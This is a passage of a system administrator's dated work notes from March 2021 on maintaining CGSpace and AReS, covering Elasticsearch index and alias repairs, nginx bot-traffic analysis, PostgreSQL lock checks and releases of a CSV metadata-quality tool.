+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span></code></pre></div><ul>
+<li>Then delete the temp and backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-05&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I made some pull requests to OpenRXV:
+<ul>
+<li><a href="https://github.com/ilri/OpenRXV/pull/86">docker/docker-compose.yml: Use docker volumes</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/pull/87">docker/docker-compose.yml: Pin Redis to version 5</a></li>
+</ul>
+</li>
+<li>I deployed the latest changes from the last few days on AReS production</li>
+</ul>
+<h2 id="2021-03-07">2021-03-07</h2>
+<ul>
+<li>I realized there is something wrong with the Elasticsearch indexes on AReS
+<ul>
+<li>On a new test environment I see <code>openrxv-items</code> is correctly an alias of <code>openrxv-items-final</code>:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span></code></pre></div><ul>
+<li>But on AReS production <code>openrxv-items</code> has somehow become a concrete index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span></code></pre></div><ul>
+<li>I fixed the issue on production by cloning the <code>openrxv-items</code> index to <code>openrxv-items-final</code>, deleting <code>openrxv-items</code>, and then re-creating it as an alias:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-07
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-final
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Delete backups and remove read-only mode on <code>openrxv-items</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-03-07&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Linode sent alerts about the CPU usage on CGSpace yesterday and the day before
+<ul>
+<li>Looking in the logs I see a few IPs making heavy usage on the REST API and XMLUI:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E <span style="color:#e6db74">&#39;0[56]/Mar/2021&#39;</span> | goaccess --log-format<span style="color:#f92672">=</span>COMBINED -
+</span></span></code></pre></div><ul>
+<li>I see the usual IPs for CCAFS and ILRI importer bots, but also <code>143.233.242.132</code> which appears to be for GARDIAN:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c Delphi
+</span></span><span style="display:flex;"><span>6237
+</span></span><span style="display:flex;"><span># zgrep <span style="color:#e6db74">&#39;143.233.242.132&#39;</span> /var/log/nginx/access.log.1 | grep -c -v Delphi
+</span></span><span style="display:flex;"><span>6418
+</span></span></code></pre></div><ul>
+<li>They seem to make requests twice, once with the Delphi user agent that we know and already mark as a bot, and once with a &ldquo;normal&rdquo; user agent
+<ul>
+<li>Looking in Solr I see they have been using this IP for awhile, as they have 100,000 hits going back into 2020</li>
+<li>I will add this IP to the list of bots in nginx and purge it from Solr with my <code>check-spider-ip-hits.sh</code> script</li>
+</ul>
+</li>
+<li>I made a few changes to OpenRXV:
+<ul>
+<li><a href="https://github.com/ilri/OpenRXV/issues/89">Migrated away from links to use networks</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/issues/68">Converted the backend container to use a custom image that includes <code>unoconv</code></a> so we don&rsquo;t have to manually install it anymore</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-08">2021-03-08</h2>
+<ul>
+<li>I approved the WLE item that I edited last week, and all the metadata is there: <a href="https://hdl.handle.net/10568/111810">https://hdl.handle.net/10568/111810</a>
+<ul>
+<li>So I&rsquo;m not sure what Niroshini&rsquo;s issue with metadata is&hellip;</li>
+</ul>
+</li>
+<li>Peter sent a message yesterday saying that his item finally got committed
+<ul>
+<li>I looked at the Munin graphs and there was a MASSIVE spike in database activity two days ago, and now database locks are back down to normal levels (from 1000+):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>13
+</span></span></code></pre></div><ul>
+<li>On 2021-03-03 the PostgreSQL transactions started rising:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/03/postgres_querylength_ALL-week.png" alt="PostgreSQL query length week"></p>
+<ul>
+<li>After that the connections and locks started going up, peaking on 2021-03-06:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/03/postgres_locks_ALL-week.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2021/03/postgres_connections_ALL-week.png" alt="PostgreSQL connections week"></p>
+<ul>
+<li>I sent another message to Atmire to ask if they have time to look into this</li>
+<li>CIFOR is pressuring me to upload the batch items from last week
+<ul>
+<li>Vika sent me a final file with some duplicates that Peter identified removed</li>
+<li>I extracted and re-applied my basic corrections from last week in OpenRefine, then ran the items through <code>csv-metadata-quality</code> checker and uploaded them to CGSpace</li>
+<li>In total there are 1,088 items</li>
+</ul>
+</li>
+<li>Udana from IWMI emailed to ask about CGSpace thumbnails</li>
+<li>Udana from IWMI emailed to ask about an item uploaded recently that does not appear in AReS
+<ul>
+<li><a href="https://hdl.handle.net/10568/111794">The item</a> was added to the archive on 2021-03-05, and I last harvested on 2021-03-06, so this might be an issue of a missing item</li>
+</ul>
+</li>
+<li>Abenet got a quote from Atmire to buy 125 credits for 3750€</li>
+<li>Maria at Bioversity sent some feedback about duplicate items on AReS</li>
+<li>I&rsquo;m wondering if the issue of the <code>openrxv-items-final</code> index not getting cleared after a successful harvest (which results in having 200,000, then 300,000, etc items) has to do with the alias issue I fixed yesterday
+<ul>
+<li>I will start a fresh harvest on AReS without now to check, but first back up the current index just in case:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-08
+</span></span><span style="display:flex;"><span># start harvesting on AReS
+</span></span></code></pre></div><ul>
+<li>As I saw on my local test instance, even when you cancel a harvesting, it replaces the <code>openrxv-items-final</code> index with whatever is in <code>openrxv-items-temp</code> automatically, so I assume it will do the same now</li>
+</ul>
+<h2 id="2021-03-09">2021-03-09</h2>
+<ul>
+<li>The harvesting on AReS finished last night and everything worked as expected, with no manual intervention
+<ul>
+<li>This means that <a href="https://github.com/ilri/OpenRXV/issues/64">the issue</a> we were facing for a few months was due to the <code>openrxv-items</code> index being deleted and re-created as a standalone index instead of an alias of <code>openrxv-items-final</code></li>
+</ul>
+</li>
+<li>Talk to Moayad about OpenRXV development
+<ul>
+<li>We realized that the missing/duplicate items issue is probably due to the long harvesting time on the REST API, as the time between starting the harvesting on page 0 and finishing the harvesting on page 900 (in the CGSpace example), some items will have been added to the repository, which causes the pages to shift</li>
+<li>I proposed a solution in the <a href="https://github.com/ilri/OpenRXV/issues/67">GitHub issue</a>, where we consult the site&rsquo;s XML sitemap after harvesting to see if we missed any items, and then we harvest them individually</li>
+</ul>
+</li>
+<li>Peter sent me a list of 356 DOIs from Altmetric that don&rsquo;t have our Handles, so we need to Tweet them
+<ul>
+<li>I used my <code>doi-to-handle.py</code> script to generate a list of handles and titles for him:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><h2 id="2021-03-10">2021-03-10</h2>
+<ul>
+<li>Colleagues from ICARDA asked about how we should handle ISI journals in CG Core, as CGSpace uses <code>cg.isijournal</code> and MELSpace uses <code>mel.impact-factor</code>
+<ul>
+<li>I filed <a href="https://github.com/AgriculturalSemantics/cg-core/issues/39">an issue</a> on the cg-core project to ask colleagues for ideas</li>
+</ul>
+</li>
+<li>Peter said he doesn&rsquo;t see &ldquo;Source Code&rdquo; or &ldquo;Software&rdquo; in the <a href="https://cgspace.cgiar.org/handle/10568/1/search-filter?field=type">output type facet on the ILRI community</a>, but I see it on the home page, so I will try to do a full Discovery re-index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    318m20.485s
+</span></span><span style="display:flex;"><span>user    215m15.196s
+</span></span><span style="display:flex;"><span>sys     2m51.529s
+</span></span></code></pre></div><ul>
+<li>Now I see ten items for &ldquo;Source Code&rdquo; in the facets&hellip;</li>
+<li>Add GPL and MIT licenses to the list of licenses on CGSpace input form since we will start capturing more software and source code</li>
+<li>Added the ability to check <code>dcterms.license</code> values against the SPDX licenses in the csv-metadata-quality tool
+<ul>
+<li>Also, I made some other minor fixes and released <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.6">version 0.4.6</a> on GitHub</li>
+</ul>
+</li>
+<li>Proof and upload twenty-seven items to CGSpace for Peter Ballantyne
+<ul>
+<li>Mostly Ugandan outputs for CRP Livestock and Livestock and Fish</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-14">2021-03-14</h2>
+<ul>
+<li>Switch to linux-kvm kernel on linode20 and linode18:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># apt update <span style="color:#f92672">&amp;&amp;</span> apt full-upgrade
+</span></span><span style="display:flex;"><span># apt install linux-kvm
+</span></span><span style="display:flex;"><span># apt remove linux-generic linux-image-generic linux-headers-generic linux-firmware
+</span></span><span style="display:flex;"><span># apt autoremove <span style="color:#f92672">&amp;&amp;</span> apt autoclean
+</span></span><span style="display:flex;"><span># reboot
+</span></span></code></pre></div><ul>
+<li>Deploy latest changes from <code>6_x-prod</code> branch on CGSpace</li>
+<li>Deploy latest changes from OpenRXV <code>master</code> branch on AReS</li>
+<li>Last week Peter added OpenRXV to CGSpace: <a href="https://hdl.handle.net/10568/112982">https://hdl.handle.net/10568/112982</a></li>
+<li>Back up the current <code>openrxv-items-final</code> index on AReS to start a new harvest:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-14
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>After the harvesting finished it seems the indexes got messed up again, as <code>openrxv-items</code> is an alias of <code>openrxv-items-temp</code> instead of <code>openrxv-items-final</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span></code></pre></div><ul>
+<li>Anyways, the number of items in <code>openrxv-items</code> seems OK and the AReS Explorer UI is working fine
+<ul>
+<li>I will have to manually fix the indexes before the next harvesting</li>
+</ul>
+</li>
+<li>Publish the web version of the DSpace CSV Metadata Quality checker tool that I wrote this weekend on GitHub: <a href="https://github.com/ilri/csv-metadata-quality-web">https://github.com/ilri/csv-metadata-quality-web</a>
+<ul>
+<li>Also, it is deployed on Heroku: <a href="https://fierce-ocean-30836.herokuapp.com/">https://fierce-ocean-30836.herokuapp.com/</a></li>
+<li>I was running it on Google App Engine originally, but they have <em>way</em> too aggressive caching of static assets</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-16">2021-03-16</h2>
+<ul>
+<li>Review ten items for Livestock and Fish and Dryland Systems from Peter
+<ul>
+<li>I told him to try the new web-based CSV Metadata Qualiter checker and he thought it was cool</li>
+<li>I found one exact duplicate item and it gave me an idea to try to detect this in the tool</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-17">2021-03-17</h2>
+<ul>
+<li>I added the ability to check for duplicate items to csv-metadata-quality</li>
+<li>I also made some minor optimizations in the Pandas code</li>
+<li>I <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.7">tagged version 0.4.7 of csv-metadata-quality on GitHub</a></li>
+</ul>
+<h2 id="2021-03-18">2021-03-18</h2>
+<ul>
+<li>I added the ability to check for, and fix, &ldquo;mojibake&rdquo; characters in csv-metadata-quality</li>
+</ul>
+<h2 id="2021-03-21">2021-03-21</h2>
+<ul>
+<li>Last week Atmire asked me which browser I was using to test the duplicate checker, which I had <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=934">reported</a> as not loading
+<ul>
+<li>I tried to load it in Chrome and it works&hellip; hmmm</li>
+</ul>
+</li>
+<li>Back up the current <code>openrxv-items-final</code> index to start a fresh AReS Harvest:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then start harvesting in the AReS Explorer admin UI</li>
+</ul>
+<h2 id="2021-03-22">2021-03-22</h2>
+<ul>
+<li>The harvesting on AReS yesterday completed, but somehow I have twice the number of items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 206204,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Hmmm and even my backup index has a strange number of items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 844,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>I deleted all indexes and re-created the openrxv-items alias:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    }
+</span></span></code></pre></div><ul>
+<li>Then I started a new harvesting</li>
+<li>I switched the Node.js in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to v12 since v10 will cease to be supported soon
+<ul>
+<li>I re-deployed DSpace Test (linode26) with Node.js 12 and restarted the server</li>
+</ul>
+</li>
+<li>The AReS harvest finally finished, with 1047 pages of items, but the <code>openrxv-items-final</code> index is empty and the <code>openrxv-items-temp</code> index has a 103,000 items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 103162,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>I tried to clone the temp index to the final, but got an error:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
+</span></span><span style="display:flex;"><span>{&#34;error&#34;:{&#34;root_cause&#34;:[{&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;}],&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;},&#34;status&#34;:400}% 
+</span></span></code></pre></div><ul>
+<li>I looked in the Docker logs for Elasticsearch and saw a few memory errors:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
+</span></span></code></pre></div><ul>
+<li>According to <code>/usr/share/elasticsearch/config/jvm.options</code> in the Elasticsearch container the default JVM heap is 1g
+<ul>
+<li>I see the running Java process has <code>-Xms 1g -Xmx 1g</code> in its process invocation so I guess that it must be indeed using 1g</li>
+<li>We can <a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html">change the heap size with the ES_JAVA_OPTS environment variable</a></li>
+<li>Or perhaps better, we should <a href="https://www.elastic.co/guide/en/elasticsearch/reference/master/jvm-options.html">use a jvm.options.d file</a> because if you use the environment variable it overrides all other JVM options from the default <code>jvm.options</code></li>
+<li>I tried to set memory to 1536m by binding an options file and restarting the container, but it didn&rsquo;t seem to work</li>
+<li>Nevertheless, after restarting I see 103,000 items in the Explorer&hellip;</li>
+<li>But the indexes are still kinda messed up&hellip; the <code>openrxv-items</code> index is an alias of the wrong index!</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>    &#34;openrxv-items-final&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {}
+</span></span><span style="display:flex;"><span>    },
+</span></span><span style="display:flex;"><span>    &#34;openrxv-items-temp&#34;: {
+</span></span><span style="display:flex;"><span>        &#34;aliases&#34;: {
+</span></span><span style="display:flex;"><span>            &#34;openrxv-items&#34;: {}
+</span></span><span style="display:flex;"><span>        }
+</span></span><span style="display:flex;"><span>    },
+</span></span></code></pre></div><h2 id="2021-03-23">2021-03-23</h2>
+<ul>
+<li>For reference you can also get the Elasticsearch JVM stats from the API:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_nodes/jvm?human&#39;</span> | python -m json.tool
+</span></span></code></pre></div><ul>
+<li>I re-deployed AReS with 1.5GB of heap using the <code>ES_JAVA_OPTS</code> environment variable
+<ul>
+<li>It turns out that this <em>is</em> the recommended way to set the heap: <a href="https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html">https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html</a></li>
+</ul>
+</li>
+<li>Then I fixed the aliases to make sure <code>openrxv-items</code> was an alias of <code>openrxv-items-final</code>, similar to how I did a few weeks ago</li>
+<li>I re-created the temp index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
